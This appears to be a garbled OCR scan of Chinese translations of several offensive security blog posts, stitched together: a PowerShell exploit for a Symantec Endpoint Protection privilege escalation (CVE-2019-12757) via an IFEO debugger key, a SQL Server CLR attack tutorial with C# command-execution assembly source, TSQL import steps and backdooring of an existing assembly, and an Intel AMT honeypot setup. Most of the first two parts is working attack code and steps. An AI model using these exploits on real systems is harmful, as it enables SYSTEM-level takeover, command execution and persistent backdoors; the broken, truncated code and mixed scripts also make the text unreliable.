1/0: 846:5YD: P (A; OICI; KR; ; MD) (A;OICI;KA; ; ; BA) (A;OÍCT; KÀ ; ; ; 5- 1-5- 21-2123539750- 3720698071 -3650009049- 1002) 





当前 登录 的 用 户 现在 具有 “ wsqmcons.exe" 可 执行 文件 的 "图 像 文件 执行 选项 "注册 表 项 的 “完全 控制 ” 
权限 ， 可 以 轻易 地 创建 * Debugger 注册 表 项 并 将 其 指向 我 们 的 有 效 负 载 。 在 这 种 情况 下 ， 将 是 


“C:\Windows\System32\cmd.exe /c cmd.exe” 
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wsqmcons.exe" 作 为 可 执行 文件 来 设置 IFEO 调 试 器 值 的 原因 是 Windows 10 默 认 存 在 一 个 名 为 " 
Consolidator" 的 计划 任务 。 该 计划 任务 以 “NT AUTHORITY\SYSTEM" 运 行 ， 并 且 启 动 " 
wsqmcons.exe"。 将 我 们 的 “恶意 "调试 器 设置 为 " wsqmcons.exe" 后 ， 当 计划 任务 “合并 器 "启动 时 ， 
有 效 负载 将 运行 。 


-- yr Y ya 
1 


PEI 


ж 
ж 
这 导致 我 们 的 payload 以 “ NT AUTHORITY\SYSTEM" 权 限 运 行 ， 从 而 导致 本 地 特权 升级 : 


se 2572 NT ALITHORITY 


` PA ^ “ T Lt "Y 
svchost exe 08 3.168 564 K 2572 NT AUTHOR System 





可 以 在 这 里 找到 漏洞 证 明代 码 : https : 
Ilgist.github.com/enigma0x3/5dbb9a72b592992b27dd703edb4 
c20b1 
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Write-Host "[*] Installing NTObjectManager..." -ForeGroundgolor "Green" 
install-module NTObjectManager -Scope CurrentUser -Force 
import-module NTObjectManager 
Write-Host "[*] Checking for Tamper Protection" -ForeGroundColor "Green" 
$Result = Get-ItemProperty "HKLM: \SOFTWARE\WOW6432Node\Symantec\Symantec Endpoi 
if($Result.Disabled -eq "1") 
{ 
$User = [System.Security.Principal.WindowsIdentity]::GetCurrent().User 
$SID = $User.Value 
Write-Host "[*] User's SID is: $SID" -ForeGroundColor "Green" 
Write-Host "[*] Removing registry key..." -ForeGroundColor "Green" 
Remove-Item "HKLM: \SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protectic 
Write-Host "[*] Creating Symbolic link to IFEO on wsqmcons.exe" -ForeGroundC 
[NtApiDotNet.NtKey]::CreateSymbolicLink("NRegistryMMachineNSOFTWARENWOW6432N 
Write-Host "[*] Symbolic Link Created, triggering vulnerability..." -ForeGrc 
New-Item -Path "c:\" -Name "exploit" -ItemType "directory" 
Start-Process "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection" 
Write-Host "[*] Sleeping 10 seconds" -ForeGroundColor "Green" 
Start-Sleep "10" 


Write-Host "[*] Adding debugger key to оп IFEO of wsqmcons.exe..." -ForeGrot 
New-ItemProperty "HKLM:NSOFTWAREMMicrosoftNWindows NT\CurrentVersion\Image F 
Write-Host "[*] Starting the Consolidator Task..." -ForeGroundColor "Green" 


Get-ScheduledTask "Consolidator" | Start-ScheduledTask 
Write-Host "Done, cmd.exe should be running as NT AUTHORITYNSYSTEM" -ForeGrc 
} elsef{ 


Write-Host "[!] Tamper protection on, exiting" -ForeGroundColor "Red" 


WEB: CVE-2019-12757: Local Privilege Escalation in Symantec Endpoint Protection 
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攻击 SQL Server слева 







来 源 : Attacking SQL Server CLR 7 es 在 此 博客 中 ， EI жый BMRA (Lee 

Christensen) 开发 的 CLR 程 序 集 攻击 ， pe athan Kirk 的 CLR 博 / 中 进行 介绍 。 我 将 回顾 
如 何在 SQL Server 中 创建 ， 导 入 ， 导 出 和 修改 CLR 程 序 集 ， 以 实现 特权 升级 ， OS 命令 执行 和 持久 
性 为 目标 。 我 还 将 分 享 一 些 新 的 PowerUpSQL 函 数 ， 这 些 函 数 可 用 于 在 Active Directory 环 境 中 更 大 
规模 地 执行 CLR 攻 击 。 


什么 是 SQL Server 中 的 自 定义 CLR 程 序 集 ? 为 了 撰写 本 博客 ， 我 们 将 定义 一 个 公共 语言 运行 时 
(CLR) 程序 集 作为 可 导入 SQL Server 的 .NET DLL (或 DLL 组 ) 。 导 入 的 DLL 方 法 可 以 链接 到 存储 
过 程 并 通过 TSQL 执 行 。 创 建 和 导入 自 定义 CLR 程 序 集 的 功能 是 开发 人 员 扩 展 SQL Server 本 机 功能 
的 一 种 好 方法 ， 但 是 也 为 攻击 者 创造 了 机 会 。 


a Server 创 建 自 定义 CLR DLL 下 面 是 一 个 基于 Nathan Kirk 的 工作 和 一 些 不 错 的 ft 
j 的 C# 模 板 。 当 然 ， 您 可 以 进行 所 需 的 任何 修改 ， 将 文件 保存 到 " с: Vtemp 


\ pe o 
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ing System; 4 HE $ m rs 
System.Data; 

System.Data.SqlClient; 

System.Data.SqlTypes; 

Microsoft.SqlServer.Server; 

System. IO; 

system. Diagnostics; 

System. Text; 


public partial class StoredProcedures 


[Microsoft .SqlServer .Server .SqlProcedure] 
public static void cmd_exec (SqlString execCommand) 


Process proc = new Process(); 

proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; 
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value) ; 
proc.StartInfo.UseShellExecute = false; 
proc.StartInfo.RedirectStandardOutput = true; 

proc.Start(); 


// Create the record and specify the metadata for the columns. 
SglDataRecord record = new SglDataRecord(new SglMetaData("output", SglDt 


// Mark the beginning of the result set. 
SglContext.Pipe.SendResultsStart(record); 


// Set values for each column in the row 
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); 


// Send the row back to the client. 
SqlContext.Pipe.SendResultsRow(record); 


// Mark the end of the result set. 
SglContext.Pipe.SendResultsEnd(); 


proc.WaitForExit(); 
proc.Close(); 


使 用 csc.exe 编 译 器 将 * c: \temp\cmd_exec.cs" 简 单 地 编译 为 DLL。 即 使 您 没有 安装 Visual 
Studio，csc.exe 编 译 器 也 会 默认 附带 .NET 框 架 。 它 在 Windows 系 统 上 的 某 个 位 置 。 可 以 用 
PowerShell 命 令 来 帮助 找到 它 。 Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" - 
Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname - 
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First 1 -ExpandProperty fullname 使 用 如 下 命令 编译 га 
С: NWindowsMMicrosoft. NET\Framework64\v4. 0.30319Ncsc. exe /target: library 
c:\temp\cmd_exec.cs 


如 何 将 CLR DLL 导入 SQL Server 要 将 新 的 DLL 导入 SQL Server, %3Е<узадтіп М, CREATE 
СМЕ ЕЦЕ ASSEMBLY 权 限 。 请 按照 以 下 步骤 注册 DLL 并 将 其 链接 到 存储 过 程 ， 以 
便 可 以 通过 TSQL 执 行 cmd_exec 方 法 。 以 系统 管理 员 身份 登录 到 SQL Server， 并 在 下 面 发 出 TSQL 
查询 。 


-- Select the msdb database 
use msdb 


-- Enable show advanced options on the server 
sp configure 'show advanced options',1 
RECONFIGURE 

GO 

-- Enable clr on the server 

sp configure 'clr enabled',1 

RECONFIGURE 

GO 


-- Import the assembly 
CREATE ASSEMBLY my assembly 
FROM 'c:NtempNcmd exec.dll' 
WITH PERMISSION SET - UNSAFE; 


-- Link the assembly to a stored procedure 
CREATE PROCEDURE [dbo].[cmd exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME 
GO 


现在 ， 您 应 该 能 够 通过 * msdb "数据 库 中 的 " cmd_exec" 存 储 过 程 执行 OS 命 令 ， 如 下 例 所 示 。 
42 SUüLlQuerys.sqi ~ MSSQLSRVUGSQLSERVERZU T4 mdb (sa (99) - Microsoft SOL Server Managemen! Studio Айтас”) Pw o Ж 
I» pt (ни Que, Buet Debug Low Winde Кес 
о- 85 ^o E" dw-o» BBG X SO о: a о PASE -. 
Bb endo + | # Geeue Debug “U S di i” RS Syl ДАП Ду! zs = siasa, 


SGLQueryssql- MS Ota msdb за (е e X gi - MS. 014 madi (sa (51))" 
WITH PERMISSION SET - UNSATE 


CREATE PROCEDURE [dbo] [cmd exec] QexecCommand NVARCHAR 4008: AS EXTERNAL NAME [my assembly]. fStoredProcedures] [cme 





мей SOCOM SO SERVER а 





完成 后 ， 可 以 使 用 下 面 的 TSQL 删 除 过 程 和 程序 集 。 DROP PROCEDURE cmd exec DROP ASSEMBLY 
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my. assembly 


以 十 六 进 制 无 文件 方式 导入 CLR 如 果 您 阅读 Nathan Kirk 的 京 始 入 客 系列 ， 您 已 经 知道 将 CLR 程 序 
集 导 入 SQL Server 时 不 必 引 用 DLL 文 件 。" CREATE ASSEMBLY" 还 将 接受 CLR DLL 文件 的 十 六 进 
制 字符 串 表示 形式 。 以 下 是 一 个 PowerShell 脚 本 示例 ， 该 示例 显示 了 如 何 将 * cmd_exec.dll" 文 件 转 
换 为 TSQL 命 令 ， 该 命令 可 用 于 创建 不 带 物理 文件 引用 的 程序 集 。 


# Target file 
$assemblyFile = "c:NtempNcmd exec.dll" 


# Build top of TSQL CREATE ASSEMBLY statement 
$stringBuilder - New-Object -Type System.Text.StringBuilder 
$stringBuilder.Append("CREATE ASSEMBLY [my assembly] AUTHORIZATION [dbo] FROM 'r 


# Read bytes from file 

$fileStream = [IO.File]::OpenRead($assemblyFile) 

while (($byte = $fileStream.ReadByte()) -gt -1) { 
$stringBuilder .Append($byte.ToString("X2")) | Out-Null 


# Build bottom of TSQL CREATE ASSEMBLY statement 
$stringBuilder.AppendLine("'"nWITH PERMISSION SET = UNSAFE") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 


# Build create procedure command 

$stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[cmd exec] @execCommand NVARCt 
$stringBuilder.AppendLine("GO") | Out-Null 

$stringBuilder.AppendLine(" ") | Out-Null 


4 Create run os command 
$stringBuilder.AppendLine("EXEC[dbo].[cmd exec] 'whoami'") | Out-Null 
$stringBuilder.AppendLine("GO") | Out-Null 
$stringBuilder.AppendLine(" ") | Out-Null 


# Create file containing all commands 
$stringBuilder.ToString() -join "" | Out-File c:\temp\cmd_exec.txt 


如 果 一 切 顺 利 ,“c: \temp\cmd_exec.txt' 文 件 应 包含 以 下 TSQL 命 令 。 在 示例 中 ， 十 六 进 制 字 符 
串 已 被 截断 ， 但 您 的 字符 串 应 更 长 。 必 
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-- Select the MSDB database s * 
USE msdb 


-- Enable clr on the server 
Sp Configure 'clr enabled', 1 
RECONFIGURE 

GO 


-- Create assembly from ascii hex 

CREATE ASSEMBLY [my assembly] AUTHORIZATION [dbo] FROM 
0х405А90000300000004000000Ғ [ TRUNCATED] 

WITH PERMISSION SET - UNSAFE 

GO 





-- Create procedures from the assembly method cmd exec 
CREATE PROCEDURE [dbo].[my assembly] @execCommand NVARCHAR (4000) AS EXTERNAL NA 
GO 


-- Run an OS command as the SQL Server service account 
EXEC[dbo].[cmd exec] 'whoami' 
GO 


当 您 从 SQL Server HAY" c: \ temp \ cmd_exec.txt" 文 件 中 以 系统 管理 员 身 份 运 行 TSQL 时 ， 输 出 应 
如 下 所 示 : 


SQLQuery5.sqi - MSSQLSRVOAXSQLSERVER2014.msdb (sa (59))* - Microsoft SQL Server Manage.. P= BOX 
Не Edit Wew Query Project Debug Took Window Нер 
0-2/8- C R P diee DEBS xXx029- 4 D 
у ть - | # Execute Debug ура TiS O60) 5 2 eu А 


SQUQueryS.sq! - MS, 014. msdb isa (59))" o X ТЕГ С Te 
CREATE ASSEMBLY [my assembly] AUTHORIZATION [dbo] FROM 
Qx4D5A90000 300000004000000F F FF 0000BS000000000000004000000000000000000000000000000000000 
WITH PERMISSION SET UNSAFE 
GO 
CREATE PROCEDURE [dbo].[cmd exec] @execCommand NVARCHAR (4000) AS EXTERNAL МАМЕ [my ass 
GO 
EXEC[dbo].[my assembly] 'whoami' 
GO 


cmd exec ' 
16% 
2 Rests 1 Messages 


rt acthonty system 





j Query executed successfully MSSQLSRVOJ,SOLSERVER2014 (1... за (59) msdb 00:9000 ! 






TTE 





Ri 
L. 


PowerUpSQL НАМЕ 如 果 您 尚未 使 用 PowerUpSQL， 则 可 以 在 ! 


22 20 TEUER 


Lig Ж Т1 
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ЖЕЕ T — T PowerUpSQLERZIGIB FB" Create-SQLFileCLRDII", 以 动态 创建 类 似 的 DLL 和 TSQL 肢 
本 。 它 还 支持 用 于 设置 自 定义 程序 集 名 称 ， 类 名 称 ， 方 方法 名 称 和 存储 过 程 名 称 的 选项 。 如 果 未 指 
定 ， 则 将 它们 全 部 随机 化 。 下 面 是 一 个 基本 的 命令 示例 : 


PS C:\temp> Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir 
C# File: c:NtempNruncmd.csc 
CLR DLL: c:\temp\runcmd.dil 
SQL Cmd: c:NtempNruncmd. txt 


» 


下 面 是 一 个 简短 的 脚本 ， 用 于 生成 10 个 示例 CLR DLL / CREATE ASSEMBLY TSQL 脚 本 。 在 实验 室 


中 使 用 CLR 组 件 时 ， 它 可 以 派 上 用 场 。 1..10| %{ Create-SQLFileCLRD11 -Verbose - 
ProcedureName myfile$  -OutDir c:\temp -OutFile myfile$ } 


如 何 列 出 现 有 的 CLR 程 序 集 和 CLR 存 储 过 程 您 可 以 使 用 下 面 的 TSQL 查 询 来 验证 您 的 CLR 程 序 集 是 
否 正确 设置 ， 或 者 寻找 现 有 的 用 户 定义 的 CLR 程 序 集 。 


ЖЕ: 这 是 我 在 已 外 找到 的 一 些 代码 的 修改 版 本 。 


USE msdb 
SELECT SCHEMA NAME(so.[schema id]) AS [schema name], 
af.file id, 
af.name * '.dll' as [file name], 
asmbly.clr name, 
asmbly.assembly id, 
asmbly.name AS [assembly name], 
am.assembly class, 
am.assembly method, 
So.object id as [sp object id], 
so.name AS [sp name], 
so.[type] as [sp type], 
asmbly.permission set desc, 
asmbly.create date, 
asmbly.modify date, 
af.content 
FROM Sys.assembly modules am 
INNER JOIN sys.assemblies asmbly 
ON asmbly.assembly id - am.assembly id 
INNER JOIN sys.assembly files af 
ON asmbly.assembly id - af.assembly id 
INNER JOIN sys.objects so 
ON so.[object id] - am.[object id] 
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通过 此 查询 ， 我 们 可 以 看 到 文件 名 ， 程 序 集 名 称 ， 程 序 集 类 名 称 ， 程 序 集 方法 以 及 该 方法 映射 到 的 
存储 过 程 。 


SQLQuery3.sal - MSSQLSRVO4 ae ER2014.msdb (sa (531)* - Microsoft SQL Server Manage - D ox 
Не fait үзе 
o0-o/g---tuy 


Query Project Debug Took — Wind Hele 





ELE so. [schema id] AS [schema name] 
af 

af.nam | as [file пате] 

asmbly.clr name 

asmbly.assembly id 

asmbly name AS [assembly name] 

am.assembly class 


am.assembly method 


; Messages 
Не name 
nd ewm di 
mies di 
түбек di 
түйе? di 
fink di 


дес di 
түйес di 


myfüed di 
mie di 
түнег di 
mie 1 di 


түйелі gi 


Query execute 





您 应 该 支 在 结果 中 看 到 ' my_assembly"。 如 果 运 行 了 我 之 前 提供 的 “ Create-SQLFileCLRDII"S > 4E pk 
的 10 个 TSQL 查 询 ， 那 么 您 还 将 看 到 与 这 些 程序 集 相关 的 程序 集 信息 。 我 在 PowerUpSQL 中 为 此 添 
加 了 一 个 名 为 " Get-SQLStoredProcedureCLR" 的 函数 ， 该 函数 将 迭代 可 访问 的 数据 库 并 为 每 个 数据 
库 提供 程序 集 信息 。 下 面 是 命令 示例 。 Get-SQLStoredProcedureCLR -Verbose -Instance 
MSSQLSRVOANSQLSERVER2014 -Username sa -Password 'sapassword!' | Out-GridView 您 还 
可 以 使 用 以 下 命令 针对 所 有 域 SQL Server 执 行 该 命令 (前 提 是 您 具有 正确 的 权限 ) o Get- 
SQLInstanceDomain -Verbose | е Кошны наты -Verbose -Instance 


MSSQLSRVO4\SQLSERVER2014 -Username sa -Password 'sapassword!' | Format-Table - 
AutoSize 


映射 过 程 参数 并 非 只 有 攻击 者 会 创建 不 安全 的 程序 集 。 有 时 ， 开 发 人 员 会 创建 执行 OS 命令 或 与 操 
作 系 统 资源 进行 交互 的 程序 集 。 结 果 ， 定 向 和 反 转 这 些 程序 集 有 时 会 导致 权限 提升 错误 。 例 如 ， 如 
果 我 们 的 程序 集 已 经 存在 ， 我 们 可 以 尝试 确定 它 接受 的 参数 以 及 如 何 使 用 它们 。 只 是 为 了 好 玩 ， 让 
我 们 使 用 下 面 的 查询 盲目 确 定 “ cmd_exec" 存 储 过 程 采用 哪些 参数 。 


SEEECT pr.name as procname, 
pa.name as param name, 
TYPE NAME(system type id) as Type, 
pa.max length, 
pa.has default value, 
pa.is nullable 


FROM Sys.all parameters ра 
INNER JOIN Sys.procedures pr on pa.object id - pr.object id 
WHERE pr.type like 'pc' and pr.name like 'cmd exec' 
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system type id 











在 此 示例 中 ， 我 们 可 以 看 到 它 仅 接受 一 个 名 为 " execCommand 的 字符 串 参 娄 。 以 存储 过 程 为 目标 
的 攻击 者 可 能 能 够 确定 它 可 以 用 于 OS 命令 执行 。 


将 SQL Server 中 存在 的 CLR 程 序 集 导出 到 DLL 查找 现 有 升级 路 径 的 唯一 选择 不 是 简单 地 测试 现 有 
CLR 组 装 过 程 的 功能 。 在 SQL Server 中 ， 我 们 还 可 以 将 用 户 定义 的 CLR 程 序 集 导出 回 DLL。 守 让 我 
们 谈 谈 从 CLR 识 别 到 CLR 源 代码 ! 首先 ， 我 们 必须 识别 程序 集 ， 将 它们 导出 回 DLL， 然 后 反 编译 它 
们 ， 以 便 可 以 分 析 它 们 的 问题 (或 进行 修改 以 注入 后 门 程序 ) 使 用 PowerUpSql Get- 
SQLStoredProcedureCLR -Verbose -Instance MSSQLSRVOANSQLSERVER2014 -Username sa - 
Password 'sapassword!' | Format-Table -AutoSize 相同 的 功能 支持 "ExportFolder” 选 项 ， 
会 将 程序 集 DLL 导 出 到 该 文件 夹 。 以 下 是 示例 命令 和 示例 输出 。 Get-SQLStoredProcedureCLR - 
Verbose -Instance MSSQLSRVO4\SQLSERVER2014 -ExportFolder c:\temp -Username sa - 


Password Format-Table -AutoSize 


PS C:Ntemp» $Results = Get-SQLStoredProcedureCLR -Verbose -Instance MSSQLSRVO4\SQLSERVER2014 -ExportFolder c: temp 


'sapassword!' | 


> MSSQLSRVO4\SQLSERVER2014 : 
E: MSSQLSRVO4\SQLSERVER2014 : 
1 MSSQL SRVO4\ SOL 5ЕНУЕК2014 : 
: MSSQLSRVO4\SQLSERVER2014 : 
2 MSSQLSRVO4\SQLSERVER2014 : 
1. MSSQLSRVO4\SQLSERVER2014 : 
+ MSSQLSRVO4XSQLSERVER2014 : 
; MSSQLSRVO4NSQUSERVER2014 : 
t: MSSQLSRVO4\SQLSERVER2014 : 
2 MSSQLSRVO4\SQLSERVER2014 : 
: MSSQLSRVO4\SQLSERVER2014 : 
1 MSSQLSRVO4\SQLSERVER2014 : 
1  M$SQUSRVO4XSQUSERVER2014 : 
: MSSQLSRVO4\SQLSERVERZ014 : 
: MSSQLSRVO4ANSQUSERVER2014 : 
2 MSSQLSRVO4NSQLSERVER2014 : 
1 MSSQLSRVO4\SQLSERVER2Z014 : 
2 MSSQLSRVO4\SQLSERVERZ014 : 
2 MSSQUSRVOANSQUSERVER2014. : 
г MSSQUSRVOANSQUSERVER2014- : 
: MSSQLSRVO4\SOLSERVER2014 : 
2 MSSQLSRVO4\SQLSERVER2014 : 
: MSSQLSRVO4NSQLUSERVER2014 : 
: MSSQLSRVOANSQUSERVER2014 < 
t. MSSQLSRVO4NSQUSERVER2014 : 
HE MSSQLSRVO4NSQLSERVER2014 ШЫ 


ME KM 





Connection Success. 

Searching for CLR stored procedures іп master 

- File:myfile6.d11 Assembly:pjpekzro Class:eFgnfR Method:ZiQmtvxF Proc:sp_myfil 
Creating export folder: c:\temp\CLRExports 
Creating server folder: tempNCLRExportsNMSSQUSRVO4. SQLSERVER2014 
Creating database folder: c:\cemp\CLRExports \MSSQLSRVO4_SQLSERVER2014\master 
огы myfile6.d11 
File:myfileS.dll Assembly:YAJZRWjwb Class:vpxifjnoE Method:pVIHwwXLC Proc:sp 
Epor ng myfile5.d11 
File:myfile4.dll Assemhly:ovHtuPpAsi Class:dEtfsaM Method:SCBHweGVRI Proc:sp I 
Fr pellen, myfile4.d11 
File:myfile3.dll Assembly:orRhvgrwtu Class:hkkMwnqQ Method: zQfNeuKVbw Proc:sp 
ENT myfile3.d11 
File:myfile2.d11 Assembly:rubulPc Class:YxTAiv8 Method:wekgFfj Proc:sp myfilel 
Exporting myfile2.dll 
File:myfilel.dll Assembly:zRcUnukZ Class:NadyjGClIe Method:OgoiHGwR Proc:sp_J 
vow myfile1.dl1l 
File:myfile10.dll Assembly:gvcSuAaMuw Class:oFUGkHJfcI Method:MBTicRdaQc Prod 
Eee туҒ11е10.411 
Еійе:туҒ11е9.011 Assembly:jlFHb Class:qswuxeEA Method:QEilm Proc:sp myfile9 
Exporting myfile9.d11 
File:myfile8.d11 Assembly:tçGopv Class:ezlwSr wethod:mSskx Ргос:5р.туҒі1е8 
Seba myfile8.d11 
File:myfile7.d11 Assembly:JlItjoQb Class:tkfxygPsH Method:MobkiQYa Proc: sp_m 


exporting myfile7.dll 


Searching for CLR stored procedures in тетрд 


red nroced: Bod: 


您 是 域 用 户 和 sysadmin， 则 也 可 以 使 用 以 下 命令 按 比例 导出 CLR DLL Get- 


SQLInstanceDomain -Verbose | Get-SQLStoredProcedureCLR -Verbose -Instance 
MSSQLSRVO4\SQLSERVER2014 -Username sa -Password 'sapassword!' -ExportFolder 


c:\temp | Format-Table -AutoSize DLL 可 以 在 输出 文件 夹 中 找到 。 该 脚本 将 基于 每 个 服务 器 
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名 称 ， 实 例 和 数据 库 名 称 动态 构建 文件 夹 结构 。 








一 msdb 





CLRExports к MSSQLSRVO4 SQLSERVER2014 y msdb 











ста exec.dll 
myfile1.dll 
myfile2 dil 
Recent places myfile3,di 
myfile4.dil 
Libraries myfile3.c 
- Documents myfile7.dll 
Music myfile8.dll 
=. Pictures myfileS.dll 
E Videos myfile12.dll 
& Computer 





现在 ， 您 可 以 使 用 自己 喜欢 的 反 编 译 器 查看 源 代 码 . 


修改 CLR DLL 并 攻 盖 已 经 导入 到 SQL Server 的 程序 集 下 面 简 要 概述 如 何 使 用 dnSpy 反 编译 ， 查 
看 ， 编 辑 ， 保 存 和 重新 导入 现 有 的 SQL Server CLR DLL。 您 可 以 从 山下 下 载 dnSpy o 


对 于 本 练习 ， 我 们 将 修改 先前 从 SQL Server 导 出 的 cmd_exec.dll。 


。 在 dnSpy 中 打开 cmd_exec.dll 文 件 。 在 左 侧面 板 中 ， 向 下 钻 取 ， 直 到 找到 “ cmd_exec 方法 并 将 
其 选中 。 这 将 立即 允许 您 查看 源 代码 并 开始 寻找 错误 。 


bp Sat 0 


Ж cmd_exec(SqfString) : void 
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f. + 





View Debug Window Hep (у Š ( . j Start 


。 接 下 来 ， 右 键 单 击 包 含 源 代 码 的 右面 板 ， 然 后 选择 "编辑 方法 (C4) ..". 


ре 


"X cmd exvec(SqlString) :void 


2 ФОХ 


。 随心 所 欲 地 编辑 代码 。 但 是 ， 在 此 示例 中 ， 我 添加 了 一 个 简单 的 “后 门 "， 每 次 调用 “ ста ехес" 
方法 时 ， 该 文件 都 会 将 一 个 文件 添加 到 *“ с: Vtemp \" 目 录 中 。 示 例 代 码 和 屏幕 截图 如 下 


[SqlProcedure] 


public static void cmd_exec(SqlString execCommand) 


{ 


Process 
expr 05 
expr. 05 


expr. 05. 


expr 05 


expr. 05. 
expr 05. 


Process 


expr. 54. 
expr 54. 
expr. 54. 
ехрг 54. 
expr 54. 
expr 54. 


expr 05 - new Process(); 


.StartInfo.FileName = "C:NNwWindowsNNSystem32NNcmd . ехе"; 
.StartInfo.Arguments = string.Format(" /C 109)", execCommand.Value); 


StartInfo.UseShellExecute - true; 

сате (Оу? 

WaitForExit(); 

Close(); 

expr 54 - new Process(); 

StartInfo.FileName = "C:NNWindowsNNSystem32NNcmd . exe" ; 
StartInfo.Arguments = string.Format(" /C 'whoami > c:\\temp\\clr_b 
StartInfo.UseShellExecute - true; 

Start(); 

WaitForExit(); 

Close(); 


№ 
e 
eo 
o 


R System.Data.5glTypez; 


100 % 


Code  Descnption 


8: 
File 4 View Debug Window Нер 
M3 Export to Project 

ah Seve Code. C. 
Save Module... e] 
Save Ай. Corte Shift $ 
ы) Open Cul+ O 
Open from GAC Ctr Shift- Q 
Open List 
load Ай Assemblies 


t Close All 


Sort Assemblies 
би 


рев References 


€» 202000001 

ес 2000002 

a NIE 
КІ Derved Types 


1 05000002 


ns ( 
`, exéctonmand / 


> 
>a 
›@ 
4. 5 
›@ 
›@ 
›@ 


System. Transactions 
> @ Systeri Runtime Rem: (4202 CE IO t TN 


， 每 次 编译 CLR 时 ， 都 会 生成 一 个 唯一 的 GUID 并 将 其 能 入 到 文件 头 
中 ， 这 样 就 可 以 “区 分 同一 文件 的 两 个 版 本 "。 这 称 为 MVID (模块 版 本 ID) 。 要 履 盖 已 经 导入 到 





。 在 dnspy 中 打开 “ cmd_exec"。 然 后 向 下 钴 取 PE 部 分 并 选择 #GUID" 存 储 流 。 然 后 ， 右 键 单 击 
它 ， 然 后 选择 “在 十 六 进 制 编辑 器 中 显示 数据 "。 


您 要 做 的 就 是 用 任意 值 修改 所 选 字 节 


E чо 
dg 
up 
a 
din 
T: 
Un n 
за 
а. 
@ 
g 
4 


ТИЭРЭ ciel hl РГӘ: 





。 从 顶部 菜单 中 选择 "文件 "， 然 后 选择 “保存 模块 .…" 





也 可 以 使 用 下 面 的 PowerUPSQL 命 令 示 例 从 新 修改 的 * cmd_exec.dl 文 件 中 获取 十 六 进 制 字 节 并 生 
成 ALTER 语 句 


PS C:\temp> Create-SQLFileCLRDll -Verbose -SourceDllPath .Хста ехес.411 
VERBOSE: Target C# File: NA 

VERBOSE: Target DLL File: .Ncmd exec.dll 

VERBOSE: Grabbing bytes from the dll 

VERBOSE: Writing SQL to: C:\Users\SSUTHE~1\AppData\Local\Temp\CLRFile.txt 
C# File: МА 

CLR DLL: .Ncmd exec.dll 

SQL Ста: C:\Users\SSUTHE~1\AppData\Local\Temp\CLRFile. txt 


新 的 cmd_exec.txt 应 该 看 起 来 像 下 面 的 语句 。 


-- Choose the msdb database 

use msdb 

-- Alter the existing CLR assembly 
ALTER ASSEMBLY [my_assembly] FROM 
Ox4D5A90000300000004000000F [TRUNCATED | 
WITH PERMISSION_SET = UNSAFE 

GO 


ALTER 语 句 用 于 替换 现 有 的 CLR， 而 不 是 DROP 和 CREATE。 正 如 Microsoft 所 说 ,“ALTER 
ASSEMBLY 不 会 中 断 正在 运行 的 程序 集中 的 代码 。 当 前 会 话 通过 使 用 程序 集 的 未 更 改 位 来 完成 执 
行 。TSQL 查 询 执行 应 类 似 于 下 面 的 屏幕 快照 。 


SQA Query! - MSSQLSR 
De [dk Vex  Quey P 


VER2014,msib isa (53)* ~ 





Microsoft SQL Server Management Studio (Administrator) T 


bly] 1 


)o0060004000000F F FFó060n2000000000600004000060000006006000000600600 





要 检查 您 的 代码 修改 是 否 有 效 ， 请 运行 " cmd_exec" 存 储 过 程 ， 并 验证 是 否 已 创建 和 с: \ temp \ 
backdoor.txt" X fE 
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АМТНопеуроЕ ЖЕР (翻译 ) 


0x00 前 言 


Intel AMT Web 漏 洞 ，CVE-2017-5689。 用 于 监听 TCP 端 口 16992 的 Web 服 务 器 。 复 制 Intel AMT 
Web 管 理 服务 的 行为 。 0x01 安装 环境 Ubuntu 16.04 LTS Python3.5 


0x02 搭建 环境 


安装 go apt install golang-go 

root@toor-virtual-machine:~# apt install golang-go 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following package was automatically installed and is no longer required: 
snap-confine 

Use 'apt autoremove' to remove it. 

The following additional packages will be installed: 
golang-1.6-go golang-1.6-race-detector-runtime golang-1.6-src 
golang-race-detector-runtime golang-src 

Suggested packages: 
bzr mercurial subversion 

The following NEW packages will be installed: 
golang-1.6-go golang-1.6-race-detector-runtime golang-1.6-src golang-go 
golang-race-detector-runtime golang-src 

0 upgraded, 6 newly installed, 9 to remove and 7 not upgraded. 

3 not fully installed-or removed. 

Need to get 27.2 MB of archives. 

After this operation, 198 MB of additional disk space will be used. 

Do you want to continue? [Y/n] y 

Get:1 http://cn.archive.ubuntu.com/ubuntu xenial-updates/main amd64 golang-1.6-s 

rc amd64 1.6.2-0ubuntu5-16.04.2 [6,493 КВ] 


0x03 安装 


下 载 AMTHoneypot git clone 

root@toor-virtual-machine:/home/toor# git clone https://github.com/packetflare/a 
mthoneypot.git 

Cloning into 'amthoneypot'.. 

remote: Counting objects: 56, done. 

remote: Total 56 (delta 0), reused 0 (delta 0), pack-reused 56 

Unpacking objects: 100% (56/56), done. 

Checking connectivity... done. 


进入 目录 ， 并 安装 AMTHoneypot go build server.go 
root@toor-virtual ine: /home/toor /amthoneypot 
foot@toor-virtual-machine: /home/toor/amthoneypot# go build server.go 











0x04 运行 


运行 AMTHoneypot зе Белі; txt 
| 1-пас :/home/toor/amthoneypot# ./server logfile. 





txt 
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0x05 工作 机 制 


打开 浏览 器 ， 输 入 192.168.36.225:16992， 登 陆 Intel AMT Web 界 面 


intel& Active Manageme х 


€ 1 192.168.36.225 Мн + > = 





Intel’ Active Management Technology 





Log On 
Log on to Intel® Active Management Technology on this computer. 


Log On... 


. Connecting... 


€ 1: 192.168.36.225 тез > = 





Intel’ Active Management Technology 





Log On 
Log on to Intel? Active Management Technology on this computer. 


Authentication Required 





http://192.168.36.225:16992 is requesting your username and password. The site says: 
"Digest:C10000000000000000000000000000" 


User Name: 


Password: 


Cancel OK 





在 Terminal 中 
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2017/06/22 16:48: 
48: 
48: 


16: 
16: 
16: 
16: 
16: 
16: 
16: 
16: 
16: 
16: 
16: 
16: 
16: 












cept 





-Agent: 


irefox/54.0 


ferer: http:// 2 
Upgrade-Insecure-Requ 





pt-Encoding: gzip, 


: Attp://19 
